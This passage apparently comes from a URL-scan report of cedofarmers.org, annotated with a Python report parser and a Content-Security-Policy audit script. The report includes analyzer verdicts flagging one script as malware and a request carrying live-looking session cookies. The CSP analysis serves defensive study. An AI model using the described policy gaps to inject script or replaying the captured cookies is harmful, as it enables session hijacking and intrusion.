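REQ_RE = re.compile(r"^(GET|POST|HEAD|PUT|DELETE|OPTIONS|PATCH) \S+ HTTP/")
RESP_RE = re.compile(r"^HTTP/\S+ \d{3}")
ALERT_RE = re.compile(r"^Analyzer Verdict Alert (\S+) (.+)$")
VERDICT_RE = re.compile(r"^(\S+) (\S+)$")
HEX_RE = re.compile(r"^[0-9a-f]{40}$|^[0-9a-f]{64}$")


@dataclass
class Record:
    url: str
    ip: str
    status: int
    size: str
    hashes: List[str] = field(default_factory=list)         # md5, sha1, sha256 in report order
    verdicts: Dict[str, str] = field(default_factory=dict)  # analyzer -> verdict
    request_headers: Dict[str, str] = field(default_factory=dict)
    response_headers: Dict[str, str] = field(default_factory=dict)


def parse_records(text: str) -> List[Record]:
    """A URL line followed by an IP/status line opens a record; metadata follows
    until the request line, then request headers, then the response headers."""
    lines, records, rec, section, i = text.splitlines(), [], None, "meta", 0
    while i < len(lines):
        line = lines[i]
        m = STATUS_RE.match(lines[i + 1]) if i + 1 < len(lines) else None
        if m and ": " not in line:
            rec = Record(line.strip(), m.group(1), int(m.group(2)), m.group(4))
            records.append(rec)
            section, i = "meta", i + 2
            continue
        i += 1
        if rec is None:
            continue
        if section == "meta":
            if line.startswith("Hash ") or HEX_RE.match(line):
                rec.hashes.append(line.split()[-1])
            elif (a := ALERT_RE.match(line)):
                rec.verdicts[a.group(1)] = a.group(2)
            elif REQ_RE.match(line):
                section = "req"
            elif rec.verdicts and (v := VERDICT_RE.match(line)):   # "quad9 Sinkholed" rows
                rec.verdicts[v.group(1)] = v.group(2)
        elif section == "req" and RESP_RE.match(line):
            section = "resp"
        elif ": " in line:
            name, _, value = line.partition(": ")
            (rec.request_headers if section == "req" else rec.response_headers)[name.lower()] = value
    return records


def flagged_hosts(records: List[Record]) -> Dict[str, Dict[str, str]]:
    """host -> {analyzer: verdict} for every host some analyzer alerted on."""
    out: Dict[str, Dict[str, str]] = {}
    for r in records:
        if r.verdicts:
            out.setdefault(r.url.split("/", 1)[0], {}).update(r.verdicts)
    return out


def scripts_answered_with_html(records: List[Record]) -> List[str]:
    """Script fetches (Sec-Fetch-Dest: script) that got an HTML body back."""
    return [r.url for r in records
            if r.request_headers.get("sec-fetch-dest") == "script"
            and r.response_headers.get("content-type", "").startswith("text/html")]
```

Run on the full page, flagged_hosts collapses every cedofarmers.org record into one entry with the three verdicts, and scripts_answered_with_html lists /main.js and /js/google-map.js: both are script includes that resolved to the site's 404 page, and the two records carry the same SHA-256, so it is one error body served twice, not two distinct payloads. The header dictionaries are keyed lowercase because the capture mixes HTTP/1.1 capitalised names with HTTP/2 lowercase ones.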
ocsp.digicert.com/
93.184.220.29 200 OK 471 B IP 93.184.220.29:0
Hash 69293b8c8a45196bb68c2fb4a573ee67
fbd418617bfbf280af580abf1d2698db8228d84b
bda77decf1a738ce7c86b23325d36faeff1878c643547c54dd62f182fc7ad5ed
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 404
Cache-Control: max-age=142470
Content-Type: application/ocsp-response
Date: Tue, 08 Nov 2022 22:20:38 GMT
Etag: "636a5e28-1d7"
Expires: Thu, 10 Nov 2022 13:55:08 GMT
Last-Modified: Tue, 08 Nov 2022 13:48:24 GMT
Server: ECS (ska/F704)
X-Cache: HIT
Content-Length: 471
cedofarmers.org/js/jquery.magnific-popup.min.js
192.185.57.117 200 OK 9.2 kB URL HTTP/2 cedofarmers.org/js/jquery.magnific-popup.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (20087)
Hash 7a10ae63b238729dc4da7f7bd8986219
654c47168dca0ec7080f6c57e8c4482b57f879d4
b782185399b361358f7c409d6f23f22d45f695dcbb63876c35752c7b1de72db3
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.magnific-popup.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 9204
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FCommunity-Enterprises-Development-Organisation-CEDO-103372861641737%2F&tabs=timeline&width=340&height=500&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId=556701741929541
31.13.72.36 200 OK 15 kB URL HTTP/2 www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FCommunity-Enterprises-Development-Organisation-CEDO-103372861641737%2F&tabs=timeline&width=340&height=500&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId=556701741929541
IP 31.13.72.36:0
File type HTML document text, exported SGML document, ASCII text, with very long lines (18899)
Hash a8a93ea175dce4f71b348abef7a56fbf
53ade60077a076ff9dd79d635440c4727ce1acee
2d5844dddab8e3052b5e4b2b3211f0451e3e3ce8d2b074a6323a9e26e7821468
GET /plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FCommunity-Enterprises-Development-Organisation-CEDO-103372861641737%2F&tabs=timeline&width=340&height=500&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId=556701741929541 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: br
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-opener-policy: unsafe-none
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: fXf+Uhe/EYzT/BY4pFIeNKAXxFi2WV8cRyIltoAX2nqXA07m930KhVLi49Fk/HwpD9+xGCq5vQA1EsE2gK2AxQ==
date: Tue, 08 Nov 2022 22:20:38 GMT
priority: u=3,i
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
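The page-plugin response above sends an enforced content-security-policy together with a near-identical report-only copy. Its script-src admits 'unsafe-inline' and 'unsafe-eval', data: and blob: URLs and 127.0.0.1:* (any process listening on the loopback interface may serve script into the frame), while the img-getpocket.cdn.mozilla.net responses earlier ship default-src 'none'; script-src 'self'; object-src 'none', a policy that has no effect on a JPEG response but would be strict on a document. The audit below is an added example, not code from Facebook, Mozilla or the analyzer that produced this report: a CSP parser that resolves the CSP Level 3 fallback chain for fetch directives, then flags the script sources that defeat the policy's XSS protection and the missing base-uri. Both policy strings are copied from the headers above; the Facebook one is cut down to the directives the audit reads (the full header also carries connect-src, font-src, img-src, media-src and frame-src).

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# Enforced policy from the www.facebook.com/plugins/page.php response above,
# reduced to the directives this audit looks at.
FACEBOOK_CSP = (
    "default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;"
    "script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* "
    "'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;"
    "style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';"
    "worker-src blob: *.facebook.com data:;"
    "block-all-mixed-content;upgrade-insecure-requests;"
)
# Policy on the img-getpocket.cdn.mozilla.net image responses above.
POCKET_CSP = "default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'"

# Where a fetch directive falls back to when it is absent (CSP Level 3).
FALLBACK = {
    "script-src": "default-src",
    "style-src": "default-src",
    "object-src": "default-src",
    "worker-src": "child-src",
    "child-src": "script-src",
}


@dataclass(frozen=True)
class Finding:
    directive: str
    source: str   # offending source expression; "" when the directive itself is missing
    reason: str


def parse_csp(policy: str) -> Dict[str, List[str]]:
    """{directive: [sources]}; a repeated directive is ignored after its first
    occurrence, which is what browsers do."""
    directives: Dict[str, List[str]] = {}
    for chunk in policy.split(";"):
        tokens = chunk.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def effective(directives: Dict[str, List[str]], name: Optional[str]) -> Optional[List[str]]:
    """Source list that governs `name`, following the fallback chain; None if nothing does."""
    while name is not None:
        if name in directives:
            return directives[name]
        name = FALLBACK.get(name)
    return None


def _host(source: str) -> str:
    host = source.split("://", 1)[-1].split("/", 1)[0]
    return (host.rsplit(":", 1)[0] if ":" in host else host).lower()


def audit_csp(policy: str) -> List[Finding]:
    d = parse_csp(policy)
    out: List[Finding] = []
    script = effective(d, "script-src")
    if script is None:
        out.append(Finding("script-src", "", "neither script-src nor default-src: script loading is unrestricted"))
    else:
        # With a nonce or hash present, CSP2+ browsers ignore 'unsafe-inline'.
        strict = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in script)
        for s in script:
            if s == "'unsafe-inline'" and not strict:
                out.append(Finding("script-src", s, "inline scripts and on* handlers run; reflected XSS is not mitigated"))
            elif s == "'unsafe-eval'":
                out.append(Finding("script-src", s, "eval()/new Function() allowed"))
            elif s in ("*", "data:", "blob:", "http:", "https:"):
                out.append(Finding("script-src", s, "scheme or wildcard source lets attacker-controlled script load"))
            elif _host(s) in ("localhost", "127.0.0.1"):
                out.append(Finding("script-src", s, "any process listening on the loopback interface can serve script"))
    if effective(d, "object-src") is None:
        out.append(Finding("object-src", "", "missing with no default-src: plugin content is unrestricted"))
    if "base-uri" not in d:
        out.append(Finding("base-uri", "", "missing: an injected <base> retargets relative script URLs"))
    return out
```

On the Facebook policy the audit returns five script-src findings plus the missing base-uri; object-src is not reported because it falls back to the (permissive, but present) default-src. On the Pocket policy only base-uri is reported, since script-src 'self' and object-src 'none' are as tight as they get. The report-only header above differs from the enforced one only in its report-uri and the absence of the two document directives, so auditing it gives the same script-src result.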
static.xx.fbcdn.net/rsrc.php/v3/y7/r/_jixirLUzY9.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12 200 OK 4.5 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/y7/r/_jixirLUzY9.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (2186)
Hash 33ae46fb5ca5586b8eb684c440bdfde3
cc75ec00d4e015261cbc526606a7478ad72a9e43
c475fadc8a824492c8eeba78780349b668c4111794dcbe1a18fcd19bbee38de4
GET /rsrc.php/v3/y7/r/_jixirLUzY9.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 03 Nov 2023 06:15:25 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: M65G+1ylWGuOtoTEQL394w==
x-fb-debug: VQd+jiE/YM9O7IEUhklCp4iUczum/ERYFsBbEam6pexOxiTBzn2vBUxMsU53Ri0PbzNXpdK+OVkgLH6mDgWdqw==
content-length: 4455
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yl/r/SuHirPIqipH.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12 200 OK 8.2 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yl/r/SuHirPIqipH.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (9885)
Hash 0eaa197a5c011011e1489f411b042249
9ba134dd641bbbc6ce70619ccd94f5d5ef47a899
145cfec975ec864e6589409173f8f9fee2a59faf0ce28c42889897e812ab9ac4
GET /rsrc.php/v3/yl/r/SuHirPIqipH.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 03 Nov 2023 05:50:55 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: DqoZelwBEBHhSJ9BGwQiSQ==
x-fb-debug: yMzCe1sdU6mg7klvggXuZjDYvUcaDAkJnsXnHCkzBQ/uvXgKylMoqhhpMHmyOsGd3IWLNB0nsY5GHPnHulUPqg==
content-length: 8222
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12 200 OK 338 B URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (327)
Hash 76f593e842677f73cd0a06232874b2c3
25a13f79478d5a0e286a2299dca2f3b296463079
74dcbe026002f10b703960a500b50dabe518862e568a9e689dec7afa243fa44d
GET /rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 27 Oct 2023 20:08:04 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: dvWT6EJnf3PNCgYjKHSyww==
x-fb-debug: C8ru5zkRydgvHeANSR5CCnJiMJOKT/Cn1D/peSgWNQK5UFwPIyoKe+MHTJeZ5YMaL9iMR1r/NPoYeX9Euxr11g==
priority: u=3,i
content-length: 338
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yW/r/SigIl-WfFaj.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12 200 OK 4.6 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yW/r/SigIl-WfFaj.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type C source, ASCII text, with very long lines (10494)
Hash 2eb625206434356a5678c51841c11964
4ecd1c720cc21d03d6c5d68a3cfbe7636cccf23d
feab180e6aa77381b51329ed9391e05765ab1a7831691215010cce091f635781
GET /rsrc.php/v3/yW/r/SigIl-WfFaj.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 04 Nov 2023 06:52:20 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: LrYlIGQ0NWpWeMUYQcEZZA==
x-fb-debug: 7iGu7w468misanBoQha65sd9JUn7Fdp1ArgzwyEA/WmqsxntGFQ0+OsG24rQ7mU8zZ6R4kxfDbeNvU3kL2Ov+w==
priority: u=3,i
content-length: 4647
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3iLl54/yH/l/en_US/9ceEMw7kTfT.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12 200 OK 7.1 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3iLl54/yH/l/en_US/9ceEMw7kTfT.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (2905)
Hash 950c261533c6a05f36c3ec2562963ecb
65cbaffa72eb8dafe5b43aec833435170c02b15d
4c9b051d6cba504010fc8ebdba2ca7da807224e44ad7e9798bb25b90069a3e11
GET /rsrc.php/v3iLl54/yH/l/en_US/9ceEMw7kTfT.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 03 Nov 2023 14:14:05 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: lQwmFTPGoF82w+wlYpY+yw==
x-fb-debug: phadaMIRZ6ov3mzgq5gAEP4IlauDDLQqfKhKpxXgcADdE1JWQfgvH0G70mLEeZDNLSQH85Trej64mPL242l0SQ==
content-length: 7089
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yV/r/oDVETVg4GJv.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12 200 OK 7.2 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yV/r/oDVETVg4GJv.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (4061)
Hash d1ba68f146b01f4aef60d79aadb926ea
c6b4703c25d07fd2363e5d67d11e4846d9979b26
abbff04acf96f39a3121ed97505b5a23cbeee9057dd7040c58c4e423c899805d
GET /rsrc.php/v3/yV/r/oDVETVg4GJv.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 02 Nov 2023 18:54:51 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: 0bpo8UawH0rvYNearbkm6g==
x-fb-debug: nETVm4WUsTBjWzPPz30+NcQ/dUZibWclH+7BC3skx38X1frzgZPa413yNFDo1GF9yx7utvfMwnrRvZAKq6brWw==
content-length: 7236
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/ScKYGqqHLxM.css?_nc_x=Ij3Wp8lg5Kz
31.13.72.12 200 OK 5.0 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/ScKYGqqHLxM.css?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (4431)
Hash 68b687b4bd9b8bc82a675dcc86c76b59
4e9194a9831c6c1b400ebe65e6be09661f0997cd
f7acf02cb9f1350a252391e55a8e577ea291aa212f3577aa15c8f0d963a12e5f
GET /rsrc.php/v3/yF/l/0,cross/ScKYGqqHLxM.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: text/css; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 08 Nov 2023 18:03:24 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: aLaHtL2bi8gqZ13MhsdrWQ==
x-fb-debug: U2NYlGCDC8vM6+H94gXuaKpd2vCIvO+cBEZrmO/ZCY/220x4aySHC0Vjdw8uuAPICOmRg5+Qwt5jx++CX+JF9Q==
priority: u=2
content-length: 5031
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3iEpO4/yC/l/en_US/I52F_owkvX4.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12 200 OK 23 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3iEpO4/yC/l/en_US/I52F_owkvX4.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (41977)
Hash e5ac274375457b828912871811b4be94
3bbd528facf279eab4dc093a7fad9dbc837689eb
602f6ee48130b3bcb4e21f4307bd1c83d110182e1fb4cb8f118171d10c6f5ae4
